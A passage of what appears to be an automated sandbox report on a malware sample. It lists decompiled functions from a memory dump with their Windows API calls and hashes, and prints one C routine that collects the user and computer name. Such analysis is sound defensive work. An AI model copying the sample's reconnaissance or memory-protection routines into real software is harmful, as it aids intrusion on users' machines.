                              • Opcode Fuzzy Hash: 620373d5defc596f9da7f3968789873972f83b4be86fc74adf2df95c957f4157
                              • Instruction Fuzzy Hash: A8319176A00229EFDB21DFA8DC88AAE7BF8FF48354F144069F98593210DB759D44CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102BD8E, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102C05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,0102BDA2,00000000,00000000,00000000,00000000), ref: 0102C068
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 0102BDB8
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102BDCB
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0102BDDC
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0102BE47
                              • InterlockedIncrement.KERNEL32(0105049C), ref: 0102BE5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                              • String ID:
                              • API String ID: 3915436794-0
                              • Opcode ID: fb712b8afb07ba4ff725b0fa6d49f139529b5002022e3de63d48e43818e6704e
                              • Instruction ID: dea4a7beb1bea02babed4c26bb61a392a4f6c6dc3e0fda0b3c2e04a2bb37edeb
                              • Opcode Fuzzy Hash: fb712b8afb07ba4ff725b0fa6d49f139529b5002022e3de63d48e43818e6704e
                              • Instruction Fuzzy Hash: 55319AB1A00212DFDB61DF18C84496EBBE9FF44320F048959FAD683254CB35D815CF92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103A7A3, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,01028E67,00000000,747DF5B0,01025001,?,00000001,?,00000000), ref: 0103A7C3
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0103A7D8
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0103A7F4
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103A809
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103A81D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad$AddressProc
                              • String ID:
                              • API String ID: 1469910268-0
                              • Opcode ID: c733910f67af1935f00f598239869c2e0a3c02c7dc8a0859503263f45778ae8b
                              • Instruction ID: 2cf0cd367ec731b679e938699758d6088431f04e8c7b0466e47cb585660647a6
                              • Opcode Fuzzy Hash: c733910f67af1935f00f598239869c2e0a3c02c7dc8a0859503263f45778ae8b
                              • Instruction Fuzzy Hash: CE314AB6640316DFD721CF6CE9C4A9B73E9FB49310B01006AF6C5DB218D77AA802CB49
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103FF7D, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • DeleteFileA.KERNEL32(00000000,000004D2), ref: 0103FFA0
                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0103FFA9
                              • GetLastError.KERNEL32 ref: 0103FFB3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01040072
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 3543646443-0
                              • Opcode ID: cc67496ba8ccebd7fff5ef724623392e59aa5916bf7dd60f31175fb553199fb7
                              • Instruction ID: 1b000290b4f8f85cc9d9c73fd65f2b701352643ffab90fb6f71e6fe0f04dfe29
                              • Opcode Fuzzy Hash: cc67496ba8ccebd7fff5ef724623392e59aa5916bf7dd60f31175fb553199fb7
                              • Instruction Fuzzy Hash: 70213DF2641215ABC720FBA4EDCCEDB339CEF6A360F050921B6D5C7148DA79A504C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E8941, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E8941() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x74785522
						_v12 = _v12 + _t11;
						_t63 = E013E55DC(_v12 + _t11 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E013E6DFA(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x13e642f
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                              0x013e894f
                              0x013e8952
                              0x013e8955
                              0x013e895b
                              0x013e8960
                              0x013e8966
                              0x013e896e
                              0x013e8971
                              0x013e8977
                              0x013e897c
                              0x013e8985
                              0x013e8989
                              0x013e8996
                              0x013e899a
                              0x013e899c
                              0x013e89a0
                              0x013e89a3
                              0x013e89b3
                              0x013e8a05
                              0x013e8a06
                              0x013e89b5
                              0x013e89b8
                              0x013e89bf
                              0x013e89c2
                              0x013e89d5
                              0x00000000
                              0x013e89d7
                              0x013e89da
                              0x013e89df
                              0x013e89ed
                              0x013e89f0
                              0x013e89f8
                              0x013e89fb
                              0x00000000
                              0x013e89fd
                              0x013e89fd
                              0x013e8a00
                              0x013e8a00
                              0x013e89fb
                              0x013e89d5
                              0x013e8a0b
                              0x013e8a0c
                              0x013e897c
                              0x013e8a12

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,013E642D), ref: 013E8955
                              • GetComputerNameW.KERNEL32(00000000,013E642D), ref: 013E8971
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetUserNameW.ADVAPI32(00000000,013E642D), ref: 013E89AB
                              • GetComputerNameW.KERNEL32(013E642D,74785520), ref: 013E89CD
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,013E642D,00000000,013E642F,00000000,00000000,?,74785520,013E642D), ref: 013E89F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                              • String ID:
                              • API String ID: 3850880919-0
                              • Opcode ID: 33f2503547168e64c9d9b5fa81e878aeffdbf2bf099ed20ca3951d8b2d6b01f0
                              • Instruction ID: 91f2ff6536a3b4227d302d0da3efd6a9282ce238a6fa0173cdef1d1894d24236
                              • Opcode Fuzzy Hash: 33f2503547168e64c9d9b5fa81e878aeffdbf2bf099ed20ca3951d8b2d6b01f0
                              • Instruction Fuzzy Hash: FF21D876D00258EFDB21DFE9C9889EEBBFCEE44348B5444AAE501E7240DB309B459B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010252BE, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(-00000007,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,?,?,?,01033518,00000000,?,?), ref: 010252DC
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28,-00000007,?,?), ref: 010252EC
                              • ReadFile.KERNEL32(-00000007,00000000,00000000,01038E28,00000000,00000001,?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28), ref: 01025318
                              • GetLastError.KERNEL32(?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28,-00000007,?,?), ref: 0102533D
                              • CloseHandle.KERNEL32(000000FF,?,?,01033518,00000000,?,?,00000000,00000000), ref: 0102534E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastReadSize
                              • String ID:
                              • API String ID: 3577853679-0
                              • Opcode ID: bfb2d3f3fd7da22b1690034b3ee82532b682e2a9acd70b2c9cdfa030ffad03f5
                              • Instruction ID: 36f9ef1c7e97cc746d0ac678a7041b1aacae905df8c794fc00f6f46230c4f287
                              • Opcode Fuzzy Hash: bfb2d3f3fd7da22b1690034b3ee82532b682e2a9acd70b2c9cdfa030ffad03f5
                              • Instruction Fuzzy Hash: E211D672600269FFEB305F68CCC4EEE7FADEB453A0F058565FA91A7180D6B19C4087A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103C474, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 0103C485
                              • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 0103C49E
                              • StrTrimA.SHLWAPI(?,?), ref: 0103C4C6
                              • StrTrimA.SHLWAPI(00000000,?), ref: 0103C4D5
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 0103C50C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Trim$FreeHeap
                              • String ID:
                              • API String ID: 2132463267-0
                              • Opcode ID: 6d18d91bad58c37c573a70cae4be200a5225058e80c794557f8b2a8b51b92777
                              • Instruction ID: 0396d49d4b2e5475207b69bb82fda91f058515beb4c0824ed3f8239d7ab12f09
                              • Opcode Fuzzy Hash: 6d18d91bad58c37c573a70cae4be200a5225058e80c794557f8b2a8b51b92777
                              • Instruction Fuzzy Hash: 8711B676240316BBE7219B5CDEC8FAB7BADEB84790F140062BA85D7184DB75D840C750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01047026, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,03AE75A8,?,?,00000000,00000000,?,0103F3BE,00000000,00000000,0102E91C,00000000,0104FF8C), ref: 0104705D
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0103F3BE,00000000,00000000,0102E91C,00000000,0104FF8C,00000008,00000003), ref: 0104708D
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0104709C
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 010470BA
                              • GetLastError.KERNEL32(?,0103F3BE,00000000,00000000,0102E91C,00000000,0104FF8C,00000008,00000003), ref: 010470CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
                              • API String ID: 653387826-0
                              • Opcode ID: 0b1511fbfd00a091d4a83dba65575e56cd6417c74ae98641370cc601326f3676
                              • Instruction ID: 927e5b271540c51d4eba63ce42b5a73d5e1632b13cb3c62a315f95f97066a71c
                              • Opcode Fuzzy Hash: 0b1511fbfd00a091d4a83dba65575e56cd6417c74ae98641370cc601326f3676
                              • Instruction Fuzzy Hash: 2F21C4F9600B05EFD761DFA8C984A5ABBF8FB08310B008669EA9697610DB75E904CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102D06A, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 0102D098
                              • GetLastError.KERNEL32 ref: 0102D0BB
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0102D0CE
                              • GetLastError.KERNEL32 ref: 0102D0D9
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102D121
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                              • String ID:
                              • API String ID: 1671499436-0
                              • Opcode ID: facb2ad7e0bd7a64195c80ab99328e4ecfe09161046effcdefbbd55907216e88
                              • Instruction ID: 7f65c0e9dd3b2e45768df06ec118bca2158c0c5eb9e4e134a12855f27fd5ceda
                              • Opcode Fuzzy Hash: facb2ad7e0bd7a64195c80ab99328e4ecfe09161046effcdefbbd55907216e88
                              • Instruction Fuzzy Hash: CD218B74600214FBEB719FA8DDC8B5E7BB9FB00359F604098F682964A4C37A9D858B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01044EFF, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(01044E4B,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F1C
                              • memcpy.NTDLL(01044E4B,?,00000009,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F3E
                              • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 01044F56
                              • lstrlenW.KERNEL32(00000000,00000001,01044E4B,?,?,?,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F76
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F9B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                              • String ID:
                              • API String ID: 3065863707-0
                              • Opcode ID: 58475af58f4856265f59f878a91878b77741de2010a4bef6586102382272d975
                              • Instruction ID: 429652390c18d467d93c9cb485b1a4e7e52702aefd5b0b8d677b79baa380506b
                              • Opcode Fuzzy Hash: 58475af58f4856265f59f878a91878b77741de2010a4bef6586102382272d975
                              • Instruction Fuzzy Hash: 3B116379E41208FBDB219FA4D849FCE7FB8AB48711F008065FA85E7284D6799608CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010346D9, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcmpi.KERNEL32(00000000,?), ref: 01034708
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 01034715
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 01034728
                              • lstrcmpi.KERNEL32(010504A0,00000000), ref: 01034748
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01022A18,00000000), ref: 0103475C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                              • String ID:
                              • API String ID: 1266740956-0
                              • Opcode ID: c24879f0bf6985283e6566b2feac5c63b6a9542392fb83edd001234a536b3531
                              • Instruction ID: 8e0dcbf63bd7164bfa11ef8cc555e8d924b2f86bc962c19dc801fe390ec258d1
                              • Opcode Fuzzy Hash: c24879f0bf6985283e6566b2feac5c63b6a9542392fb83edd001234a536b3531
                              • Instruction Fuzzy Hash: 9311AF71600205EFDB55CF58C889AAEBBACFF45324F044159F895D7244DB399D04CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010428B5, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,01048C1F,?,010212D8,?), ref: 010428BF
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000,?), ref: 010428E3
                              • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,010212D8,?), ref: 010428EA
                              • lstrcpy.KERNEL32(00000000,?), ref: 01042932
                              • lstrcat.KERNEL32(00000000,?), ref: 01042941
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                              • String ID:
                              • API String ID: 2616531654-0
                              • Opcode ID: 6543d0aeb6b3df7380e239ca0b2ceab53cafe42602439e774c9510eea53da116
                              • Instruction ID: 51c6e390a7f7a9f07b3512234a027244b569a009685b8f95a6a332ac80a59d02
                              • Opcode Fuzzy Hash: 6543d0aeb6b3df7380e239ca0b2ceab53cafe42602439e774c9510eea53da116
                              • Instruction Fuzzy Hash: 101191BA3002069BE731DE69E9C8F7BBBECAB84790F050468F6C9C3104EB759805C765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102F559, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102C05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,0102BDA2,00000000,00000000,00000000,00000000), ref: 0102C068
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0102F582
                              • memcpy.NTDLL(00000000,?,?), ref: 0102F595
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 0102F5A6
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102F5BB
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0102F5F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                              • String ID:
                              • API String ID: 2349942465-0
                              • Opcode ID: b5d44d2b6ee458cd57d1d27f0bd4d9410beca4e9c165cfa45f4ec27b0b9c9912
                              • Instruction ID: aeefd214f1a6a2e99df2177607f768394164b7461df7ba61cdb4c32a954cd6ee
                              • Opcode Fuzzy Hash: b5d44d2b6ee458cd57d1d27f0bd4d9410beca4e9c165cfa45f4ec27b0b9c9912
                              • Instruction Fuzzy Hash: 0911E5BA241322EFD3615F18DC84C6F7BADEF85361B05456AF9C293218CA3A5C05CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01028712, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?,?,01024811,?,?,00000000), ref: 01028728
                              • lstrlen.KERNEL32(?,?,?,?,01024811,?,?,00000000), ref: 0102872F
                              • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0102873D
                                • Part of subcall function 01026BCF: GetLocalTime.KERNEL32(?,?,0103A620,00000000,00000001), ref: 01026BD9
                                • Part of subcall function 01026BCF: wsprintfA.USER32 ref: 01026C0C
                              • wsprintfA.USER32 ref: 0102875F
                                • Part of subcall function 0102A182: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,01028787,00000000,?,00000000,00000000,00000006,00000000), ref: 0102A1A0
                                • Part of subcall function 0102A182: wsprintfA.USER32 ref: 0102A1C5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 01028790
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                              • String ID:
                              • API String ID: 3847261958-0
                              • Opcode ID: fe75bec1df1fc422e5793cec32ba4c1b5eddf87d332a13660586aa35b4d59088
                              • Instruction ID: e4d58c9f4e2459b653022b8c0a711549cc15f6a6c2224665b16e37b40fc4270b
                              • Opcode Fuzzy Hash: fe75bec1df1fc422e5793cec32ba4c1b5eddf87d332a13660586aa35b4d59088
                              • Instruction Fuzzy Hash: 3601A179240228BFDB611F29DC44D9F7FAEFB80360F008022FE5996214D63B8921CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D243, Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0103D25A
                                • Part of subcall function 01024AFE: wcstombs.NTDLL ref: 01024BBC
                              • lstrlen.KERNEL32(?,?,?,?,?,010427DF,?,?), ref: 0103D27D
                              • lstrlen.KERNEL32(?,?,?,?,010427DF,?,?), ref: 0103D287
                              • memcpy.NTDLL(?,?,00004000,?,?,010427DF,?,?), ref: 0103D298
                              • HeapFree.KERNEL32(00000000,?,?,?,?,010427DF,?,?), ref: 0103D2BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                              • String ID:
                              • API String ID: 1256246205-0
                              • Opcode ID: f9a35b996ae1af3de879df78b8a53f1ff566e127b48244c332166bb47a6c9aac
                              • Instruction ID: 69075dd92c310502f578e2d49b7f20f9723fca0c84e15459d62ec54fc468e42a
                              • Opcode Fuzzy Hash: f9a35b996ae1af3de879df78b8a53f1ff566e127b48244c332166bb47a6c9aac
                              • Instruction Fuzzy Hash: 8C117CB9600204EFDB619F95DC44F5E7BF9EB95320F504064F585A3214D636DD109B20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103BF04, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • lstrlenW.KERNEL32(00000000,747DF560,00000000,?,00000000,?,?,0102EFEF,00000020), ref: 0103BF30
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103BF42
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF5F
                              • lstrlenW.KERNEL32(00000000,?,?,0102EFEF,00000020), ref: 0103BF6B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF7F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                              • String ID:
                              • API String ID: 3403466626-0
                              • Opcode ID: 20bf57a37da6a5b316421a9cb866776f36ada86e33bacd9b2ff2bff83f6933d0
                              • Instruction ID: 2b29ea2ed5aff63d124d415dba910e7a3954b114d48c004111e3c9d64148f174
                              • Opcode Fuzzy Hash: 20bf57a37da6a5b316421a9cb866776f36ada86e33bacd9b2ff2bff83f6933d0
                              • Instruction Fuzzy Hash: 3E018CB6200204FFD7219F98ED84F9E7BACEF49314F004061F685D7258CB7A9904CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010254B6, Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 010254D7
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010254F0
                              • OpenProcess.KERNEL32(00000400,00000000,01033B88,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102550D
                              • IsWow64Process.KERNEL32(00000000,00000000,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102551E
                              • CloseHandle.KERNEL32(00000000,?,?,01033B88,00000000,010501F4,?,00000000), ref: 01025531
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                              • String ID:
                              • API String ID: 4157061983-0
                              • Opcode ID: 1a34fefcb089cfea86f3f1e5f9f6b92ec495748220bc85bf9697bcbd36d65321
                              • Instruction ID: fb01a0bd95aeef19030bbbe9c211f121619b293d85a177fcca87326d051fac20
                              • Opcode Fuzzy Hash: 1a34fefcb089cfea86f3f1e5f9f6b92ec495748220bc85bf9697bcbd36d65321
                              • Instruction Fuzzy Hash: 98018475940228EFCB21DF69DD488EEBBF9FB4438171041AAF689D3108E73A5A01CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01033CD3, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32 ref: 01033CF3
                              • GetModuleHandleA.KERNEL32 ref: 01033D01
                              • LoadLibraryExW.KERNEL32(?,?,?), ref: 01033D0E
                              • GetModuleHandleA.KERNEL32 ref: 01033D25
                              • GetModuleHandleA.KERNEL32 ref: 01033D31
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleModule$LibraryLoad
                              • String ID:
                              • API String ID: 1178273743-0
                              • Opcode ID: 4ff7a4075e76734fdac5478fe496d3f0b0845a5166a6fd8a8a7c3c96396c3ee2
                              • Instruction ID: b211661935ddbfc241b669904fa1e5528fb60327f294db646a852e7a7d2dfb2f
                              • Opcode Fuzzy Hash: 4ff7a4075e76734fdac5478fe496d3f0b0845a5166a6fd8a8a7c3c96396c3ee2
                              • Instruction Fuzzy Hash: 9A018BB87002069F9B516F6DED84A6A7FA9FF552A07040036F998C2125EB66CC208B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103F568, Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0104784E), ref: 0103F56E
                              • StrTrimA.SHLWAPI(00000001,?,?,0104784E), ref: 0103F591
                              • StrTrimA.SHLWAPI(00000000,?,?,0104784E), ref: 0103F5A0
                              • _strupr.NTDLL ref: 0103F5A3
                              • lstrlen.KERNEL32(00000000,0104784E), ref: 0103F5AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Trim$_struprlstrlen
                              • String ID:
                              • API String ID: 2280331511-0
                              • Opcode ID: 1001e19c8141287f3880f19429ffbdb71c5efa6f59fa578ac4656cd0564500ab
                              • Instruction ID: d539e1a0194003a573dfa820005bac5a97c88777c5bd48792466783db8e24804
                              • Opcode Fuzzy Hash: 1001e19c8141287f3880f19429ffbdb71c5efa6f59fa578ac4656cd0564500ab
                              • Instruction Fuzzy Hash: 6AF0C275300116AFE7259B28E8C8F7F77ACEB88750F100029F4C5C7288DF699C018761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103E6A2, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0103E6AD
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 0103E6BE
                              • VirtualProtect.KERNEL32(00000001,00000004,00000040,0000007F,?,?,010321BF,00000000,010501F4,01050488,01025BD7,00000003,?,?,0103738E,00000000), ref: 0103E6D5
                              • VirtualProtect.KERNEL32(00000001,00000004,0000007F,0000007F,?,?,010321BF,00000000,010501F4,01050488,01025BD7,00000003,?,?,0103738E,00000000), ref: 0103E6EF
